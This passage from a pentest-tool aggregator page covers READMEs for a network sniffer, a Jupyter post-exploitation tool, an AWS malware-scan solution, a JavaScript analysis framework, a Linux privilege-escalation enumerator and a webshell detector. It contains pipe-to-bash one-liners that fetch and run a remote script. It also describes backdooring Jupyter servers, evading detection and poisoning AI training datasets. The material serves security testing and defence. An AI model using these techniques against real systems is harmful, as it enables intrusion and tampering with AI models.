    usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

    options:
    -h, --help show this help message and exit
    --interface INTERFACE
    Interface for traffic listening
    --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
    --output OUTPUT File name where the traffic will be recorded
    --input INPUT File name of the traffic dump
    --passive-arp Passive ARP (Host Discovery)

    Information about protocols

    The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

    When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

    • Impact: What kind of attack can be performed on this protocol;

    • Tools: What tool can be used to launch an attack;

    • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

    • Mitigation: Recommendations for fixing the security problems

    • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


    Installation

    Linux

    You can install Above directly from the Kali Linux repositories

    caster@kali:~$ sudo apt update && sudo apt install above

    Or...

    caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
    caster@kali:~$ git clone https://github.com/casterbyte/Above
    caster@kali:~$ cd Above/
    caster@kali:~/Above$ sudo python3 setup.py install

    macOS:

    # Install python3 first
    brew install python3
    # Then install required dependencies
    sudo pip3 install scapy colorama setuptools

    # Clone the repo
    git clone https://github.com/casterbyte/Above
    cd Above/
    sudo python3 setup.py install

    Don't forget to deactivate your firewall on macOS!

    Settings > Network > Firewall


    How to Use

    Hot mode

    Above requires root access for sniffing

    Above can be run with or without a timer:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    To stop traffic sniffing, press CTRL + Π‘

    WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

    Example:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    -----------------------------------------------------------------------------------------
    [+] Start sniffing...

    [*] After the protocol is detected - all necessary information about it will be displayed
    --------------------------------------------------
    [+] Detected SSDP Packet
    [*] Attack Impact: Potential for UPnP Device Exploitation
    [*] Tools: evil-ssdp
    [*] SSDP Source IP: 192.168.0.251
    [*] SSDP Source MAC: 02:10:de:64:f2:34
    [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
    --------------------------------------------------
    [+] Detected MDNS Packet
    [*] Attack Impact: MDNS Spoofing, Credentials Interception
    [*] Tools: Responder
    [*] MDNS Spoofing works specifically against Windows machines
    [*] You cannot get NetNTLMv2-SSP from Apple devices
    [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
    [*] MDNS Speaker MAC: 02:10:de:64:f2:34
    [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
    --------------------------------------------------

    If you need to record the sniffed traffic, use the --output argument

    caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

    If you interrupt the tool with CTRL+C, the traffic is still written to the file

    Cold mode

    If you already have some recorded traffic, you can use the --input argument to look for potential security issues

    caster@kali:~$ above --input ospf-md5.cap

    Example:

    caster@kali:~$ sudo above --input ospf-md5.cap

    [+] Analyzing pcap file...

    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 10.0.0.1
    [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication
    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 192.168.0.2
    [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication

    Passive ARP

    The tool can detect hosts without noise in the air by processing ARP frames in passive mode

    caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

    [+] Host discovery using Passive ARP

    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.88
    [*] MAC Address: 00:00:0c:07:ac:c8
    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.40
    [*] MAC Address: 00:0c:29:c5:82:81
    --------------------------------------------------

    Outro

    I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

    By: Zion3R β€” May 21st 2024 at 12:30

    V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

    User Stories

    • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
    • As a Red Teamer, you know that some browser-based actions will be visibile to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
    • As an AI Red Teamer, you understand academic algorthmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. with V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
    • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

    Usage

    Initial Setup

    1. pip install vger
    2. vger --help

    Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

    Commands

    Once a connection is established, users drop into a nested set of menus.

    The top level menu is: - Reset: Configure a different host. - Enumerate: Utilities to learn more about the host. - Exploit: Utilities to perform direct action and manipulation of the host and artifacts. - Persist: Utilities to establish persistence mechanisms. - Export: Save output to a text file. - Quit: No one likes quitters.

    These menus contain the following functionality: - List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code. - Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in runtime of the notebook. - Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root on a user-specified port with a user-specified password. - Check History: See ipython commands recently run in the target notebook. - Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal. - List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /. - Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension. - Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory). - Find models: Find models based on common file formats. - Download models: Download discovered models. - Snoop: Monitor notebook execution and results until timeout. - Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.

    Experimental

    With pip install vger[ai] you'll get LLM generated summaries of notebooks in the target environment. These are meant to be rough translation for non-DS/AI folks to do quick triage of if (or which) notebooks are worth investigating further.

    There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

    Examples



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Drs-Malware-Scan - Perform File-Based Malware Scan On Your On-Prem Servers With AWS

    By: Zion3R β€” May 20th 2024 at 12:30


    Perform malware scan analysis of on-prem servers using AWS services

    Challenges with on-premises malware detection

    It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient as modern malware uses various obfuscation techniques. Server admins may lack visibility into security events across all servers historically. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to setup and maintain additional security tools for advanced threat detection. The rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.

    Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.


    How to use AWS services to address these challenges

    The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.

    This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.

    • AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.

    • Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.

    • AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.

    Architecture

    Solution description

    The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.

    1. AWS DRS is replicating source servers from the on-premises environment to AWS (or from any cloud provider for that matter). For further details about setting up AWS DRS please follow the Quick Start Guide.
    2. Amazon GuardDuty is already enabled.
    3. AWS Security Hub is already enabled.
    4. The Malware Scan solution is triggered by a Schedule Rule in Amazon EventBridge (with prefix DrsMalwareScanStack-ScheduleScanRule). You can adjust the scan frequency as needed (i.e. once a day, a week, etc).
    5. The Schedule Rule in Amazon EventBridge triggers the Submit Orders lambda function (with prefix DrsMalwareScanStack-SubmitOrders) which gathers the source servers to scan from the Source Servers DynamoDB table.
    6. Orders are placed on the SQS FIFO queue named Scan Orders (with prefix DrsMalwareScanStack-ScanOrdersfifo). The queue is used to serialize scan requests mapped to the same DRS instance, preventing a race condition.
    7. The Process Order lambda picks a malware scan order from the queue and enriches it, preparing the upcoming malware scan operation. For instance, it inserts the id of the replicating DRS instance associated to the DRS source server provided in the order. The output of Process Order are malware scan commands containing all the necessary information to invoke GuardDuty malware scan.
    8. Malware scan operations are tracked using the DRSVolumeAnnotationsDDBTable at the volume-level, providing reporting capabilities.
    9. Malware scan commands are inserted in the Scan Commands SQS FIFO queue (with prefix DrsMalwareScanStack-ScanCommandsfifo) to increase resiliency.
    10. The Process Commands function submits queued scan commands at a maximum rate of 1 command per second to avoid API throttling. It triggers the on-demand malware scan function provided by Amazon GuardDuty.
    11. The execution of the on-demand Amazon GuardDuty Malware job can be monitored from the Amazon GuardDuty service.
    12. The outcome of malware scan job is routed to Amazon Cloudwath Logs.
    13. The Subscription Filter lambda function receives the outcome of the scan and tracks the result using DynamoDB (step #14).
    14. The DRS Instance Annotations DynamoDB Table tracks the status of the malware scan job at the instance level.
    15. The CDK stack named ScanReportStack deploys the Scan Report lambda function (with prefix ScanReportStack-ScanReport) to populate the Amazon S3 bucket with prefix scanreportstack-scanreportbucket.
    16. AWS Security Hub aggregates and correlates findings from Amazon GuardDuty.
    17. The Security Hub finding event is caught by an EventBridge Rule (with prefix DrsMalwareScanStack-SecurityHubAnnotationsRule)
    18. The Security Hub Annotations lambda function (with prefix DrsMalwareScanStack-SecurityHubAnnotation) generates additional Notes (Annotations) to the Finding with contextualized information about the source server being affected. This additional information can be seen in the Notes section within the Security Hub Finding.
    19. The follow-up activities will depend on the incident response process being adopted. For example based on the date of the infection, AWS DRS can be used to perform a point in time recovery using a snapshot previous to the date of the malware infection.
    20. In a Multi-Account scenario, this solution can be deployed directly on the AWS account hosting the AWS DRS solution. The Amazon GuardDuty findings will be automatically sent to the centralized Security Account.

    Usage

    Pre-requisites

    • An AWS Account.
    • Amazon Elastic Disaster Recovery (DRS) configured, with at least 1 server source in sync. If not, please check this documentation. The Replication Configuration must consider EBS encryption using Custom Managed Key (CMK) from AWS Key Management Service (AWS KMS). Amazon GuardDuty Malware Protection does not support default AWS managed key for EBS.
    • IAM Privileges to deploy the components of this solution.
    • Amazon GuardDuty enabled. If not, please check this documentation
    • Amazon Security Hub enabled. If not, please check this documentation

      Warning
      Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.

    Deploy

    1. Create a Cloud9 environment with Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 has node v16 which is not longer supported since 2023-09-11 git clone https://github.com/aws-samples/drs-malware-scan

      cd drs-malware-scan

      sh check_loggroup.sh

    2. Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment

      npm install cdk bootstrap cdk deploy --all Note
      The solution is made of 2 stacks: * DrsMalwareScanStack: it deploys all resources needed for malware scanning feature. This stack is mandatory. If you want to deploy only this stack you can run cdk deploy DrsMalwareScanStack
      * ScanReportStack: it deploys the resources needed for reporting (Amazon Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack you can run cdk deploy ScanReportStack

      If you want to deploy both stacks you can run cdk deploy --all

    Troubleshooting

    All lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the proper CloudWatch log groups for each function, look for the /aws/lambda/DrsMalwareScanStack-* pattern.

    The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.

    The SQS FIFO queues can be monitored using the Messages available and Message in flight metrics from the AWS SQS console

    The DRS Volume Annotations DynamoDB tables keeps track of the status of each Malware scan operation.

    Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan

    In order to analize logs from Amazon GuardDuty Malware scan operations, you can check /aws/guardduty/malware-scan-events Amazon Cloudwatch LogGroup. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.

    Cleanup

    1. Run the following commands in your terminal:

      cdk destroy --all

    2. (Optional) Delete the CloudWatch log groups associated with Lambda Functions.

    AWS Cost Estimation Analysis

    For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.

    Estimated scenario:

    • 2 Source Servers to replicate (DR) (Total Storage: 100GB - 4 disks)
    • 3 TB Malware Scanned/Month
    • 30 days of EBS snapshot Retention period
    • Daily Malware scans
    Monthly Cost Total Cost for 12 Months
    171.22 USD 2,054.74 USD

    Service Breakdown:

    Service Name Description Monthly Cost (USD)
    AWS Elastic Disaster Recovery 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period 71.41
    Amazon GuardDuty 3 TB Malware Scanned/Month 94.56
    Amazon DynamoDB 100MB 1 Read/Second 1 Writes/Second 3.65
    AWS Security Hub 1 Account / 100 Security Checks / 1000 Finding Ingested 0.10
    AWS EventBridge 1M custom events 1.00
    Amazon Cloudwatch 1GB ingested/month 0.50
    AWS Lambda 5 ARM Lambda Functions - 128MB / 10secs 0.00
    Amazon SQS 2 SQS Fifo 0.00
    Total 171.22

    Note The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments is advisable to include Business Support Plan (not considered in the estimation)

    Security

    See CONTRIBUTING for more information.

    Authors



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    JAW - A Graph-based Security Analysis Framework For Client-side JavaScript

    By: Zion3R β€” May 19th 2024 at 12:30

    An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

    This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

    JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

    Release Notes:


    Overview of JAW

    The architecture of the JAW is shown below.

    Test Inputs

    JAW can be used in two distinct ways:

    1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

    2. Web Application Analysis: Analyze a web application by providing a single seed URL.

    Data Collection

    • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

    HPG Construction

    • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

    • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).

    Analysis and Outputs

    • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

    • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

    • The outputs will be stored in the same folder as that of input.

    Setup

    The installation script relies on the following prerequisites: - Latest version of npm package manager (node js) - Any stable version of python 3.x - Python pip package manager

    Afterwards, install the necessary dependencies via:

    $ ./install.sh

    For detailed installation instructions, please see here.

    Quick Start

    Running the Pipeline

    You can run an instance of the pipeline in a background screen via:

    $ python3 -m run_pipeline --conf=config.yaml

    The CLI provides the following options:

    $ python3 -m run_pipeline -h

    usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

    This script runs the tool pipeline.

    optional arguments:
    -h, --help show this help message and exit
    --conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
    --site SITE, -S SITE website to test; overrides config file (default: None)
    --list LIST, -L LIST site list to test; overrides config file (default: None)
    --from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
    --to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

    Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

    Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

    Quick Example

    For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

    $ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

    Crawling and Data Collection

    This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScipt file that you already have on your file system, you can skip this step.

    JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

    Playwright CLI with Foxhound

    This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

    $ cd crawler
    $ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

    The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

    Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

    Puppeteer CLI

    To start the crawler, do:

    $ cd crawler
    $ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

    See here for more information.

    Selenium CLI

    To start the crawler, do:

    $ cd crawler/hpg_crawler
    $ vim docker-compose.yaml # set the websites you want to crawl here and save
    $ docker-compose build
    $ docker-compose up -d

    Please refer to the documentation of the hpg_crawler here for more information.

    Graph Construction

    HPG Construction CLI

    To generate an HPG for a given (set of) JavaScript file(s), do:

    $ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

    optional arguments:
    --lang: language of the input program
    --graphid: an identifier for the generated HPG
    --input: path of the input program(s)
    --output: path of the output HPG, must be i
    --mode: determines the output format (csv or graphML)

    HPG Import CLI

    To import an HPG inside a neo4j graph database (docker instance), do:

    $ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
    $ python3 -m hpg_neo4j.hpg_import -h

    usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

    This script imports a CSV of a property graph into a neo4j docker database.

    optional arguments:
    -h, --help show this help message and exit
    --rpath P relative path to the folder containing the graph CSV files inside the `data` directory
    --id I an identifier for the graph or docker container
    --nodes N the name of the nodes csv file (default: nodes.csv)
    --edges E the name of the relations csv file (default: rels.csv)

    HPG Construction and Import CLI (v1)

    In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

    $ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

    Specification of Parameters:

    • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
    • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
    • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
    • --hybrid=bool: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputing files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
    • --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of obsevered network requests, pass the string false to exclude (default: request_logs_short.out).
    • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
    • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
    • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

    For more information, you can use the help CLI provided with the graph construction API:

    $ python3 -m engine.api -h

    Security Analysis

    The constructed HPG can then be queried using Cypher or the NeoModel ORM.

    Running Custom Graph traversals

    You should place and run your queries in analyses/<ANALYSIS_NAME>.

    Option 1: Using the NeoModel ORM (Deprecated)

    You can use the NeoModel ORM to query the HPG. To write a query:

    • (1) Check out the HPG data model and syntax tree.
    • (2) Check out the ORM model for HPGs
    • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
    $ python3 -m analyses.example.example_query_orm  

    For more information, please see here.

    Option 2: Using Cypher Queries

    You can use Cypher to write custom queries. For this:

    • (1) Check out the HPG data model and syntax tree.
    • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
    $ python3 -m analyses.example.example_query_cypher

    For more information, please see here.

    Vulnerability Detection

    This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering

    Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:

    request_hijacking:
    enabled: true
    # [...]
    #
    domclobbering:
    enabled: false
    # [...]

    cs_csrf:
    enabled: false
    # [...]

    Step 2. Run an instance of the pipeline with:

    $ python3 -m run_pipeline --conf=config.yaml

    Hint. You can run multiple instances of the pipeline under different screens:

    $ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
    $ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
    $ # [...]

    To generate parallel configuration files automatically, you may use the generate_config.py script.

    How to Interpret the Output of the Analysis?

    The outputs will be stored in a file called sink.flows.out in the same folder as that of the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a, semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point. However, a request marked with ['NON-REACH'] is not forgeable.

    An example output entry is shown below:

    [*] Tags: ['WIN.LOC']
    [*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
    [*] Location: 29
    [*] Function: ajax
    [*] Template: ajaxloc + "/bearer1234/"
    [*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

    1:['WIN.LOC'] variable=ajaxloc
    0 (loc:6)- var ajaxloc = window.location.href

    This entry shows that on line 29, there is a $.ajax call expression, and this call expression triggers an ajax request with the url template value of ajaxloc + "/bearer1234/, where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, thus forgeable through ['WIN.LOC'].

    Test Web Application

    In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.

    First, install the dependencies via:

    $ cd tests/test-webapp
    $ npm install

    Then, run the application in a new screen:

    $ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

    Detailed Documentation.

    For more information, visit our wiki page here. Below is a table of contents for quick access.

    The Web Crawler of JAW

    Data Model of Hybrid Property Graphs (HPGs)

    Graph Construction

    Graph Traversals

    Contribution and Code Of Conduct

    Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

    Academic Publication

    If you use the JAW for academic research, we encourage you to cite the following paper:

    @inproceedings{JAW,
    title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
    author= {Soheil Khodayari and Giancarlo Pellegrino},
    booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
    year = {2021},
    address = {Vancouver, B.C.},
    publisher = {{USENIX} Association},
    }

    Acknowledgements

    JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

    @tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

    By: Zion3R β€” May 19th 2024 at 00:42


    First, a couple of useful oneliners ;)

    wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
    curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

    Note that since version 2.10 you can serve the script to other hosts with the -S flag!


    linux-smart-enumeration

    Linux enumeration tools for pentesting and CTFs

    This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

    Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

    What is it?

    This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

    From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

    It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p parameter.

    It has 3 levels of verbosity so you can control how much information you see.

    In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

    By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

    How to use it?

    The idea is to get the information gradually.

    First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.

    If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

    If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r.

    You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

    Use: ./lse.sh [options]

    OPTIONS
    -c Disable color
    -i Non interactive mode
    -h This help
    -l LEVEL Output verbosity level
    0: Show highly important results. (default)
    1: Show interesting results.
    2: Show all gathered information.
    -s SELECTION Comma separated list of sections or tests to run. Available
    sections:
    usr: User related tests.
    sud: Sudo related tests.
    fst: File system related tests.
    sys: System related tests.
    sec: Security measures related tests.
    ret: Recurren tasks (cron, timers) related tests.
    net: Network related tests.
    srv: Services related tests.
    pro: Processes related tests.
    sof: Software related tests.
    ctn: Container (docker, lxc) related tests.
    cve: CVE related tests.
    Specific tests can be used with their IDs (i.e.: usr020,sud)
    -e PATHS Comma separated list of paths to exclude. This allows you
    to do faster scans at the cost of completeness
    -p SECONDS Time that the process monitor will spend watching for
    processes. A value of 0 will disable any watch (default: 60)
    -S Serve the lse.sh script in this host so it can be retrieved
    from a remote host.

    Is it pretty?

    Usage demo

    Also available in webm video


    Level 0 (default) output sample


    Level 1 verbosity output sample


    Level 2 verbosity output sample


    Examples

    Direct execution oneliners

    bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
    bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ShellSweep - PowerShell/Python/Lua Tool Designed To Detect Potential Webshell Files In A Specified Directory

    By: Zion3R β€” May 17th 2024 at 12:30

    ShellSweep

    ShellSweeping the evil

    Why ShellSweep

    "ShellSweep" is a PowerShell/Python/Lua tool designed to detect potential webshell files in a specified directory.

    ShellSheep and it's suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is a characteristic of encrypted or obfuscated codes often found in webshells. - It only processes files with certain extensions (.asp, .aspx, .asph, .php, .jsp), which are commonly used in webshells. - Certain directories can be excluded from scanning. - Files with certain hashes can be ignored during the scan.


    How does ShellSweep find the shells?

    Entropy, in the context of information theory or data science, is a measure of the unpredictability, randomness, or disorder in a set of data. The concept was introduced by Claude Shannon in his 1948 paper "A Mathematical Theory of Communication".

    When applied to a file or a string of text, entropy can help assess the randomness of the data. Here's how it works: If a file consists of completely random data (each byte is just as likely to be any value between 0 and 255), the entropy is high, close to 8 (since log2(256) = 8).

